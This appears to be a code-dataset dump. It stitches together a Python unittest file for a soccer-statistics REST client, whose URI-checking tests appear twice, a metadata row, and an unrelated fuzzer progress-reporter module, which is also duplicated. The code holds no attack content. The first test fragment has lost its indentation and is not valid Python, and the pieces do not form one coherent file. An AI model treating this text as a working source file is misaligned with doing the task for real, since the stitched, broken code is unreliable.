uid = "420aa27ce815499c85ec0301aff61ec4"
value = self.client.validation.countries.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/countries/420aa27ce815499c85ec0301aff61ec4',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.competitions.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/competitions/420aa27ce815499c85ec0301aff61ec4',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.domesticCompetitions.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/domestic_competitions/420aa27ce815499c85ec0301aff61ec4',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.intlCompetitions.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/intl_competitions/420aa27ce815499c85ec0301aff61ec4',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.teams.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/teams/420aa27ce815499c85ec0301aff61ec4',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.venues.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/venues/420aa27ce815499c85ec0301aff61ec4',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.persons.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/persons/420aa27ce815499c85ec0301aff61ec4',
params={'app_id': 'ID', 'app_key': 'KEY'})
def test_personnel_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
"""Verify personnel resource endpoints with ID passed to GET."""
mock_resp.get.return_value.status_code = 200
uid = "807f2a61bcea4a1bb98d66fface88b44"
value = self.client.players.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/personnel/players/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.managers.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/personnel/managers/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.referees.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/personnel/referees/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
def test_club_match_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
"""Verify club match resource endpoints with ID passed to GET."""
mock_resp.get.return_value.status_code = 200
match = "420aa27ce815499c85ec0301aff61ec4"
uid = "807f2a61bcea4a1bb98d66fface88b44"
value = self.client.club.information.get(match)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/matches/420aa27ce815499c85ec0301aff61ec4/info',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.club.conditions.get(match)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/matches/420aa27ce815499c85ec0301aff61ec4/conditions',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.club.lineups.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/matches/420aa27ce815499c85ec0301aff61ec4/lineups/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.club.goals.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/matches/420aa27ce815499c85ec0301aff61ec4/goals/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.club.penalties.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/matches/420aa27ce815499c85ec0301aff61ec4/penalties/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.club.offenses.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/matches/420aa27ce815499c85ec0301aff61ec4/offenses/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.club.substitutions.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/matches/420aa27ce815499c85ec0301aff61ec4/substitutions/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.club.shootouts.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/matches/420aa27ce815499c85ec0301aff61ec4/shootouts/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
def test_natl_match_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
"""Verify national team match resource endpoints with ID passed to GET."""
mock_resp.get.return_value.status_code = 200
match = "420aa27ce815499c85ec0301aff61ec4"
uid = "807f2a61bcea4a1bb98d66fface88b44"
value = self.client.natl.information.get(match)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/matches/420aa27ce815499c85ec0301aff61ec4/info',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.conditions.get(match)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/matches/420aa27ce815499c85ec0301aff61ec4/conditions',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.lineups.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/matches/420aa27ce815499c85ec0301aff61ec4/lineups/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.goals.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/matches/420aa27ce815499c85ec0301aff61ec4/goals/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.penalties.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/matches/420aa27ce815499c85ec0301aff61ec4/penalties/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.offenses.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/matches/420aa27ce815499c85ec0301aff61ec4/offenses/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.substitutions.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/matches/420aa27ce815499c85ec0301aff61ec4/substitutions/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.natl.shootouts.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/national/matches/420aa27ce815499c85ec0301aff61ec4/shootouts/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
def test_club_events_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
    """Verify club match micro-event resource endpoints with ID passed to GET."""
    mock_resp.get.return_value.status_code = 200
    uid = "807f2a61bcea4a1bb98d66fface88b44"
    auth = {'app_id': 'ID', 'app_key': 'KEY'}
    events = self.client.club.events
    # Each micro-event collection maps onto its own path segment.
    for resource, leaf in [(events.all, 'all'),
                           (events.touches, 'touches'),
                           (events.actions, 'actions')]:
        resource.get(uid)
        mock_resp.get.assert_called_with(
            'https://foo.uri/v1/clubs/events/%s/%s' % (leaf, uid), params=auth)
def test_natl_events_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
    """Verify national team match micro-event resource endpoints with ID passed to GET."""
    mock_resp.get.return_value.status_code = 200
    uid = "807f2a61bcea4a1bb98d66fface88b44"
    auth = {'app_id': 'ID', 'app_key': 'KEY'}
    events = self.client.natl.events
    # Each micro-event collection maps onto its own path segment.
    for resource, leaf in [(events.all, 'all'),
                           (events.touches, 'touches'),
                           (events.actions, 'actions')]:
        resource.get(uid)
        mock_resp.get.assert_called_with(
            'https://foo.uri/v1/national/events/%s/%s' % (leaf, uid), params=auth)
def test_club_stats_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
    """Verify club match statistical resource endpoints with ID passed to GET."""
    mock_resp.get.return_value.status_code = 200
    uid = "807f2a61bcea4a1bb98d66fface88b44"
    self.client.club.stats.crosses.corners.get(uid)
    mock_resp.get.assert_called_with(
        'https://foo.uri/v1/clubs/stats/crosses/corners/' + uid,
        params={'app_id': 'ID', 'app_key': 'KEY'})
def test_natl_stats_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
    """Verify national team match statistical resource endpoints with ID passed to GET."""
    mock_resp.get.return_value.status_code = 200
    uid = "807f2a61bcea4a1bb98d66fface88b44"
    self.client.natl.stats.crosses.corners.get(uid)
    mock_resp.get.assert_called_with(
        'https://foo.uri/v1/national/stats/crosses/corners/' + uid,
        params={'app_id': 'ID', 'app_key': 'KEY'})
def test_analytics_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
    """Verify match analytics resource endpoints with ID passed to GET."""
    mock_resp.get.return_value.status_code = 200
    match = "420aa27ce815499c85ec0301aff61ec4"
    auth = {'app_id': 'ID', 'app_key': 'KEY'}
    analytics = self.client.analytics
    # Every analytics view hangs off /analytics/match/<match-id>/<view>.
    for resource, view in [(analytics.state, 'state'),
                           (analytics.segment, 'segment'),
                           (analytics.tsr, 'tsr')]:
        resource.get(match)
        mock_resp.get.assert_called_with(
            'https://foo.uri/v1/analytics/match/%s/%s' % (match, view), params=auth)
def test_validation_endpoints_head(self, mock_resp, resp_obj, mock_dict):
    """Verify URI of Validation resource HEAD request."""
    mock_resp.head.return_value.status_code = 200
    phases = self.client.validation.phases
    phases.head()
    mock_resp.head.assert_called_with('https://foo.uri/v1/phases',
                                      params={'app_id': 'ID', 'app_key': 'KEY'})
    mock_resp.reset_mock()
    # HEAD on a collection resource must reject a positional resource ID.
    self.assertRaises(TypeError, phases.head, 5)
def test_validation_endpoints_options(self, mock_resp, resp_obj, mock_dict):
    """Verify URI of Validation resource OPTIONS request.

    Also checks that OPTIONS rejects a positional resource ID.
    """
    mock_resp.options.return_value.status_code = 200
    value = self.client.validation.phases.options()
    mock_resp.options.assert_called_with('https://foo.uri/v1/phases',
                                         params={'app_id': 'ID', 'app_key': 'KEY'})
    mock_resp.reset_mock()
    # Bug fix: this test previously re-asserted on head() (copy-paste from
    # the HEAD test); it must exercise options().
    self.assertRaises(TypeError, self.client.validation.phases.options, 5)
def test_personnel_endpoints_head(self, mock_resp, resp_obj, mock_dict):
    """Verify URI of Personnel resource HEAD request."""
    mock_resp.head.return_value.status_code = 200
    players = self.client.players
    players.head()
    mock_resp.head.assert_called_with('https://foo.uri/v1/personnel/players',
                                      params={'app_id': 'ID', 'app_key': 'KEY'})
    mock_resp.reset_mock()
    # HEAD on a collection resource must reject a positional resource ID.
    self.assertRaises(TypeError, players.head, "807f2a61bcea4a1bb98d66fface88b44")
def test_personnel_endpoints_options(self, mock_resp, resp_obj, mock_dict):
    """Verify URI of Personnel resource OPTIONS request.

    Also checks that OPTIONS rejects a positional resource ID.
    """
    mock_resp.options.return_value.status_code = 200
    value = self.client.managers.options()
    mock_resp.options.assert_called_with('https://foo.uri/v1/personnel/managers',
                                         params={'app_id': 'ID', 'app_key': 'KEY'})
    mock_resp.reset_mock()
    # Bug fix: this test previously asserted on managers.head() (copy-paste
    # from the HEAD test); it must exercise options().
    self.assertRaises(TypeError, self.client.managers.options, "807f2a61bcea4a1bb98d66fface88b44")
def test_match_endpoints_head(self, mock_resp, resp_obj, mock_dict):
    """Verify URI of Match resource HEAD request."""
    mock_resp.head.return_value.status_code = 200
    auth = {'app_id': 'ID', 'app_key': 'KEY'}
    # Club and national-team variants share the same behaviour.
    self.client.club.information.head()
    mock_resp.head.assert_called_with('https://foo.uri/v1/clubs/matches/info', params=auth)
    self.client.natl.information.head()
    mock_resp.head.assert_called_with('https://foo.uri/v1/national/matches/info', params=auth)
    mock_resp.reset_mock()
    uid = "807f2a61bcea4a1bb98d66fface88b44"
    self.assertRaises(TypeError, self.client.club.information.head, uid)
    self.assertRaises(TypeError, self.client.natl.information.head, uid)
def test_match_endpoints_options(self, mock_resp, resp_obj, mock_dict):
    """Verify URI of Match resource OPTIONS request."""
    mock_resp.options.return_value.status_code = 200
    auth = {'app_id': 'ID', 'app_key': 'KEY'}
    # Club and national-team variants share the same behaviour.
    self.client.club.goals.options()
    mock_resp.options.assert_called_with('https://foo.uri/v1/clubs/matches/goals', params=auth)
    self.client.natl.goals.options()
    mock_resp.options.assert_called_with('https://foo.uri/v1/national/matches/goals', params=auth)
    mock_resp.reset_mock()
    uid = "807f2a61bcea4a1bb98d66fface88b44"
    self.assertRaises(TypeError, self.client.club.goals.options, uid)
    self.assertRaises(TypeError, self.client.natl.goals.options, uid)
def test_analytics_endpoints_head(self, mock_resp, resp_obj, mock_dict):
    """Verify URI of Match Analytics resource HEAD request."""
    mock_resp.head.return_value.status_code = 200
    state = self.client.analytics.state
    state.head()
    mock_resp.head.assert_called_with('https://foo.uri/v1/analytics/match/state',
                                      params={'app_id': 'ID', 'app_key': 'KEY'})
    mock_resp.reset_mock()
    # HEAD on the analytics collection must reject a positional ID.
    self.assertRaises(TypeError, state.head, "807f2a61bcea4a1bb98d66fface88b44")
def test_analytics_endpoints_options(self, mock_resp, resp_obj, mock_dict):
    """Verify URI of Match Analytics resource OPTIONS request."""
    mock_resp.options.return_value.status_code = 200
    segment = self.client.analytics.segment
    segment.options()
    mock_resp.options.assert_called_with('https://foo.uri/v1/analytics/match/segment',
                                         params={'app_id': 'ID', 'app_key': 'KEY'})
    mock_resp.reset_mock()
    # OPTIONS on the analytics collection must reject a positional ID.
    self.assertRaises(TypeError, segment.options, "807f2a61bcea4a1bb98d66fface88b44")
import unittest
import mock
from soccermetrics.rest import SoccermetricsRestClient
@mock.patch('soccermetrics.rest.resources.base.EasyDict')
@mock.patch('soccermetrics.rest.resources.base.Response')
@mock.patch('soccermetrics.rest.resources.base.requests')
class ClientCanonicalEndpointTest(unittest.TestCase):
    """
    Test canonical endpoints of API resources in client.

    The HTTP layer is patched out; every test checks that a client call
    issues the expected verb against the expected URI with the account
    credentials in the query parameters.

    Fixes two copy-paste bugs in the original: the Validation and
    Personnel OPTIONS tests re-asserted on ``head()`` instead of
    ``options()``.
    """

    # Root of every canonical endpoint under test.
    BASE = 'https://foo.uri/v1'
    # Credentials the client appends to every request.
    AUTH = {'app_id': 'ID', 'app_key': 'KEY'}

    def setUp(self):
        self.client = SoccermetricsRestClient(base_uri="https://foo.uri", account="ID", api_key="KEY")

    def create_patch(self, name):
        """Start a patcher that is automatically stopped at test teardown."""
        patcher = mock.patch(name)
        thing = patcher.start()
        self.addCleanup(patcher.stop)
        return thing

    # ---- private helpers ------------------------------------------------

    def _check_get(self, mock_resp, resource, path, *ids):
        """GET ``resource`` with ``ids`` and verify the URI that was hit."""
        resource.get(*ids)
        mock_resp.get.assert_called_with(self.BASE + path, params=self.AUTH)

    def _check_head(self, mock_resp, resource, path):
        """HEAD ``resource`` and verify the URI that was hit."""
        resource.head()
        mock_resp.head.assert_called_with(self.BASE + path, params=self.AUTH)

    def _check_options(self, mock_resp, resource, path):
        """OPTIONS ``resource`` and verify the URI that was hit."""
        resource.options()
        mock_resp.options.assert_called_with(self.BASE + path, params=self.AUTH)

    def _check_match_resources(self, mock_resp, root, stem):
        """Exercise every per-match resource under ``root`` (club or natl)."""
        match = "420aa27ce815499c85ec0301aff61ec4"
        uid = "807f2a61bcea4a1bb98d66fface88b44"
        # Whole-match resources take only the match ID.
        self._check_get(mock_resp, root.information, '%s/%s/info' % (stem, match), match)
        self._check_get(mock_resp, root.conditions, '%s/%s/conditions' % (stem, match), match)
        # Per-record resources take the match ID plus a record ID.
        for resource, leaf in [(root.lineups, 'lineups'), (root.goals, 'goals'),
                               (root.penalties, 'penalties'), (root.offenses, 'offenses'),
                               (root.substitutions, 'substitutions'),
                               (root.shootouts, 'shootouts')]:
            self._check_get(mock_resp, resource,
                            '%s/%s/%s/%s' % (stem, match, leaf, uid), match, uid)

    # ---- canonical GET tests --------------------------------------------

    def test_validation_endpoints_integer_id_get(self, mock_resp, resp_obj, mock_dict):
        """Verify URI of Validation resources with integer UIDs passed to GET."""
        mock_resp.get.return_value.status_code = 200
        v = self.client.validation
        cases = [
            (v.phases, 2, '/phases/2'),
            (v.groupRounds, 20, '/grouprounds/20'),
            (v.knockoutRounds, 20, '/knockoutrounds/20'),
            (v.confederations, 10, '/confederations/10'),
            (v.seasons, 200, '/seasons/200'),
            (v.timezones, 20, '/timezones/20'),
            (v.nameOrder, 2, '/name_order/2'),
            (v.positions, 20, '/positions/20'),
            (v.fouls, 20, '/fouls/20'),
            (v.cards, 2, '/cards/2'),
            (v.bodyparts, 2, '/bodyparts/2'),
            (v.shotevents, 20, '/shotevents/20'),
            (v.penaltyOutcomes, 2, '/penalty_outcomes/2'),
            (v.actions, 200, '/actions/200'),
            (v.modifiers, 200, '/modifiers/200'),
            (v.modifierCategories, 20, '/modifier_categories/20'),
            (v.weather, 20, '/weather/20'),
            (v.surfaces, 20, '/surfaces/20'),
        ]
        for resource, uid, path in cases:
            self._check_get(mock_resp, resource, path, uid)

    def test_validation_endpoints_uuid_get(self, mock_resp, resp_obj, mock_dict):
        """Verify URI of Validation resources with UUIDs passed to GET."""
        mock_resp.get.return_value.status_code = 200
        uid = "420aa27ce815499c85ec0301aff61ec4"
        v = self.client.validation
        cases = [
            (v.countries, '/countries/'),
            (v.competitions, '/competitions/'),
            (v.domesticCompetitions, '/domestic_competitions/'),
            (v.intlCompetitions, '/intl_competitions/'),
            (v.teams, '/teams/'),
            (v.venues, '/venues/'),
            (v.persons, '/persons/'),
        ]
        for resource, stem in cases:
            self._check_get(mock_resp, resource, stem + uid, uid)

    def test_personnel_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
        """Verify personnel resource endpoints with ID passed to GET."""
        mock_resp.get.return_value.status_code = 200
        uid = "807f2a61bcea4a1bb98d66fface88b44"
        for resource, leaf in [(self.client.players, 'players'),
                               (self.client.managers, 'managers'),
                               (self.client.referees, 'referees')]:
            self._check_get(mock_resp, resource, '/personnel/%s/%s' % (leaf, uid), uid)

    def test_club_match_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
        """Verify club match resource endpoints with ID passed to GET."""
        mock_resp.get.return_value.status_code = 200
        self._check_match_resources(mock_resp, self.client.club, '/clubs/matches')

    def test_natl_match_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
        """Verify national team match resource endpoints with ID passed to GET."""
        mock_resp.get.return_value.status_code = 200
        self._check_match_resources(mock_resp, self.client.natl, '/national/matches')

    def test_club_events_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
        """Verify club match micro-event resource endpoints with ID passed to GET."""
        mock_resp.get.return_value.status_code = 200
        uid = "807f2a61bcea4a1bb98d66fface88b44"
        ev = self.client.club.events
        for resource, leaf in [(ev.all, 'all'), (ev.touches, 'touches'),
                               (ev.actions, 'actions')]:
            self._check_get(mock_resp, resource, '/clubs/events/%s/%s' % (leaf, uid), uid)

    def test_natl_events_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
        """Verify national team match micro-event resource endpoints with ID passed to GET."""
        mock_resp.get.return_value.status_code = 200
        uid = "807f2a61bcea4a1bb98d66fface88b44"
        ev = self.client.natl.events
        for resource, leaf in [(ev.all, 'all'), (ev.touches, 'touches'),
                               (ev.actions, 'actions')]:
            self._check_get(mock_resp, resource, '/national/events/%s/%s' % (leaf, uid), uid)

    def test_club_stats_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
        """Verify club match statistical resource endpoints with ID passed to GET."""
        mock_resp.get.return_value.status_code = 200
        uid = "807f2a61bcea4a1bb98d66fface88b44"
        self._check_get(mock_resp, self.client.club.stats.crosses.corners,
                        '/clubs/stats/crosses/corners/' + uid, uid)

    def test_natl_stats_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
        """Verify national team match statistical resource endpoints with ID passed to GET."""
        mock_resp.get.return_value.status_code = 200
        uid = "807f2a61bcea4a1bb98d66fface88b44"
        self._check_get(mock_resp, self.client.natl.stats.crosses.corners,
                        '/national/stats/crosses/corners/' + uid, uid)

    def test_analytics_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
        """Verify match analytics resource endpoints with ID passed to GET."""
        mock_resp.get.return_value.status_code = 200
        match = "420aa27ce815499c85ec0301aff61ec4"
        a = self.client.analytics
        for resource, view in [(a.state, 'state'), (a.segment, 'segment'),
                               (a.tsr, 'tsr')]:
            self._check_get(mock_resp, resource,
                            '/analytics/match/%s/%s' % (match, view), match)

    # ---- HEAD / OPTIONS tests -------------------------------------------

    def test_validation_endpoints_head(self, mock_resp, resp_obj, mock_dict):
        """Verify URI of Validation resource HEAD request."""
        mock_resp.head.return_value.status_code = 200
        self._check_head(mock_resp, self.client.validation.phases, '/phases')
        mock_resp.reset_mock()
        self.assertRaises(TypeError, self.client.validation.phases.head, 5)

    def test_validation_endpoints_options(self, mock_resp, resp_obj, mock_dict):
        """Verify URI of Validation resource OPTIONS request."""
        mock_resp.options.return_value.status_code = 200
        self._check_options(mock_resp, self.client.validation.phases, '/phases')
        mock_resp.reset_mock()
        # Bug fix: previously re-asserted on head() in the OPTIONS test.
        self.assertRaises(TypeError, self.client.validation.phases.options, 5)

    def test_personnel_endpoints_head(self, mock_resp, resp_obj, mock_dict):
        """Verify URI of Personnel resource HEAD request."""
        mock_resp.head.return_value.status_code = 200
        self._check_head(mock_resp, self.client.players, '/personnel/players')
        mock_resp.reset_mock()
        self.assertRaises(TypeError, self.client.players.head, "807f2a61bcea4a1bb98d66fface88b44")

    def test_personnel_endpoints_options(self, mock_resp, resp_obj, mock_dict):
        """Verify URI of Personnel resource OPTIONS request."""
        mock_resp.options.return_value.status_code = 200
        self._check_options(mock_resp, self.client.managers, '/personnel/managers')
        mock_resp.reset_mock()
        # Bug fix: previously asserted on managers.head() in the OPTIONS test.
        self.assertRaises(TypeError, self.client.managers.options, "807f2a61bcea4a1bb98d66fface88b44")

    def test_match_endpoints_head(self, mock_resp, resp_obj, mock_dict):
        """Verify URI of Match resource HEAD request."""
        mock_resp.head.return_value.status_code = 200
        self._check_head(mock_resp, self.client.club.information, '/clubs/matches/info')
        self._check_head(mock_resp, self.client.natl.information, '/national/matches/info')
        mock_resp.reset_mock()
        self.assertRaises(TypeError, self.client.club.information.head, "807f2a61bcea4a1bb98d66fface88b44")
        self.assertRaises(TypeError, self.client.natl.information.head, "807f2a61bcea4a1bb98d66fface88b44")

    def test_match_endpoints_options(self, mock_resp, resp_obj, mock_dict):
        """Verify URI of Match resource OPTIONS request."""
        mock_resp.options.return_value.status_code = 200
        self._check_options(mock_resp, self.client.club.goals, '/clubs/matches/goals')
        self._check_options(mock_resp, self.client.natl.goals, '/national/matches/goals')
        mock_resp.reset_mock()
        self.assertRaises(TypeError, self.client.club.goals.options, "807f2a61bcea4a1bb98d66fface88b44")
        self.assertRaises(TypeError, self.client.natl.goals.options, "807f2a61bcea4a1bb98d66fface88b44")

    def test_analytics_endpoints_head(self, mock_resp, resp_obj, mock_dict):
        """Verify URI of Match Analytics resource HEAD request."""
        mock_resp.head.return_value.status_code = 200
        self._check_head(mock_resp, self.client.analytics.state, '/analytics/match/state')
        mock_resp.reset_mock()
        self.assertRaises(TypeError, self.client.analytics.state.head, "807f2a61bcea4a1bb98d66fface88b44")

    def test_analytics_endpoints_options(self, mock_resp, resp_obj, mock_dict):
        """Verify URI of Match Analytics resource OPTIONS request."""
        mock_resp.options.return_value.status_code = 200
        self._check_options(mock_resp, self.client.analytics.segment, '/analytics/match/segment')
        mock_resp.reset_mock()
        self.assertRaises(TypeError, self.client.analytics.segment.options, "807f2a61bcea4a1bb98d66fface88b44")
| en | 0.67387 | Test canonical endpoints of API resources in client. Verify URI of Validation resources with integer UIDs passed to GET. Verify URI of Validation resources with UUIDs passed to GET. Verify personnel resource endpoints with ID passed to GET. Verify club match resource endpoints with ID passed to GET. Verify national team match resource endpoints with ID passed to GET. Verify club match micro-event resource endpoints with ID passed to GET. Verify national team match micro-event resource endpoints with ID passed to GET. Verify club match statistical resource endpoints with ID passed to GET. Verify national team match statistical resource endpoints with ID passed to GET. Verify match analytics resource endpoints with ID passed to GET. Verify URI of Validation resource HEAD request. Verify URI of Validation resource OPTIONS request. Verify URI of Personnel resource HEAD request. Verify URI of Personnel resource OPTIONS request. Verify URI of Match resource HEAD request. Verify URI of Match resource OPTIONS request. Verify URI of Match Analytics resource HEAD request. Verify URI of Match Analytics resource OPTIONS request. | 2.739438 | 3 |
fuzzer/progress_reporter.py | ysoftdevs/wapifuzz | 3 | 6623866 | <filename>fuzzer/progress_reporter.py<gh_stars>1-10
import os
import threading
import sys
import datetime
from configuration_manager import ConfigurationManager
# Short polling interval used while waiting for the fuzzer to generate its
# first mutation (before regular progress reporting takes over).
DID_FUZZING_STARTED_CHECKS_TIME_INTERVAL_IN_SECONDS = 5
def report_progress(session, junit_logger):
    """Periodically report fuzzing progress; hard-exit if fuzzing hangs.

    Re-schedules itself via plan_another_report() — at the configured
    reporting interval once fuzzing has started, or at a short polling
    interval before the first mutation exists. If the mutant index has not
    advanced between two reports, the process is terminated with exit
    code 2.
    """
    if did_fuzzing_already_started(session):
        if is_fuzzing_hanged(session):
            message = create_hanged_message(session)
            print(message, file=sys.stderr)
            try:
                # Best effort: flush the JUnit report before terminating.
                junit_logger.close_test()
            except Exception:
                # Narrowed from a bare except; the report may be unusable,
                # but terminating the hung process matters more here.
                pass
            finally:
                # Hard exit: also stops any pending reporting timers.
                os._exit(2)
        if is_fuzzing_still_in_progress(session):
            plan_another_report(session, junit_logger, ConfigurationManager.get_reporting_interval())
            message = create_report_message(session)
            print(message)
    else:
        # NOTE(review): this else pairs with the "did fuzzing start" check
        # (poll again soon until the first mutation appears) — confirm
        # against upstream indentation.
        plan_another_report(session, junit_logger, DID_FUZZING_STARTED_CHECKS_TIME_INTERVAL_IN_SECONDS)
def plan_another_report(session, junit_logger, reporting_interval):
    """Schedule the next report_progress() call after ``reporting_interval`` seconds."""
    timer = threading.Timer(reporting_interval, report_progress, [session, junit_logger])
    timer.start()
def did_fuzzing_already_started(session):
    """Return True once the session has generated at least one mutation."""
    total_mutations = session.total_num_mutations
    return total_mutations > 0
def is_fuzzing_hanged(session):
    """Return True when the mutant index has not advanced since the last call.

    The previously seen index is kept as a function attribute (a poor man's
    static variable); it starts at -1 so the first call never reports a hang.
    """
    current_index = session.total_mutant_index
    hanged = current_index == is_fuzzing_hanged.previous_mutant_index
    is_fuzzing_hanged.previous_mutant_index = current_index
    return hanged
is_fuzzing_hanged.previous_mutant_index = -1
def is_fuzzing_still_in_progress(session):
    """Return True while some mutations remain to be executed."""
    executed = session.total_mutant_index
    planned = session.total_num_mutations
    return planned != executed
def create_report_message(session):
    """Build a timestamped progress line with a completion percentage."""
    done = session.total_mutant_index
    total = session.total_num_mutations
    percentage = str(round(done / total * 100, 2))
    return "%s: Proceeded %s of %s (%s%%) test cases" % (
        datetime.datetime.now(), done, total, percentage)
def create_hanged_message(session):
    """Build the error line emitted when fuzzing stops making progress."""
    return ("Fuzzing hangs on test case number: %s. See log file for an error message."
            % session.total_mutant_index)
| <filename>fuzzer/progress_reporter.py<gh_stars>1-10
import os
import threading
import sys
import datetime
from configuration_manager import ConfigurationManager
# Short polling interval used while waiting for the fuzzer to generate its
# first mutation (before regular progress reporting takes over).
DID_FUZZING_STARTED_CHECKS_TIME_INTERVAL_IN_SECONDS = 5
def report_progress(session, junit_logger):
    """Periodically report fuzzing progress; hard-exit if fuzzing hangs.

    Re-schedules itself via plan_another_report() — at the configured
    reporting interval once fuzzing has started, or at a short polling
    interval before the first mutation exists. If the mutant index has not
    advanced between two reports, the process is terminated with exit
    code 2.
    """
    if did_fuzzing_already_started(session):
        if is_fuzzing_hanged(session):
            message = create_hanged_message(session)
            print(message, file=sys.stderr)
            try:
                # Best effort: flush the JUnit report before terminating.
                junit_logger.close_test()
            except Exception:
                # Narrowed from a bare except; the report may be unusable,
                # but terminating the hung process matters more here.
                pass
            finally:
                # Hard exit: also stops any pending reporting timers.
                os._exit(2)
        if is_fuzzing_still_in_progress(session):
            plan_another_report(session, junit_logger, ConfigurationManager.get_reporting_interval())
            message = create_report_message(session)
            print(message)
    else:
        # NOTE(review): this else pairs with the "did fuzzing start" check
        # (poll again soon until the first mutation appears) — confirm
        # against upstream indentation.
        plan_another_report(session, junit_logger, DID_FUZZING_STARTED_CHECKS_TIME_INTERVAL_IN_SECONDS)
def plan_another_report(session, junit_logger, reporting_interval):
    """Schedule the next report_progress() call after ``reporting_interval`` seconds."""
    timer = threading.Timer(reporting_interval, report_progress, [session, junit_logger])
    timer.start()
def did_fuzzing_already_started(session):
    """Return True once the session has generated at least one mutation."""
    total_mutations = session.total_num_mutations
    return total_mutations > 0
def is_fuzzing_hanged(session):
    """Return True when the mutant index has not advanced since the last call.

    The previously seen index is kept as a function attribute (a poor man's
    static variable); it starts at -1 so the first call never reports a hang.
    """
    current_index = session.total_mutant_index
    hanged = current_index == is_fuzzing_hanged.previous_mutant_index
    is_fuzzing_hanged.previous_mutant_index = current_index
    return hanged
is_fuzzing_hanged.previous_mutant_index = -1
def is_fuzzing_still_in_progress(session):
    """Return True while some mutations remain to be executed."""
    executed = session.total_mutant_index
    planned = session.total_num_mutations
    return planned != executed
def create_report_message(session):
    """Build a timestamped progress line with a completion percentage."""
    done = session.total_mutant_index
    total = session.total_num_mutations
    percentage = str(round(done / total * 100, 2))
    return "%s: Proceeded %s of %s (%s%%) test cases" % (
        datetime.datetime.now(), done, total, percentage)
def create_hanged_message(session):
    """Build the error line emitted when fuzzing stops making progress."""
    return ("Fuzzing hangs on test case number: %s. See log file for an error message."
            % session.total_mutant_index)
| none | 1 | 2.280039 | 2 | |
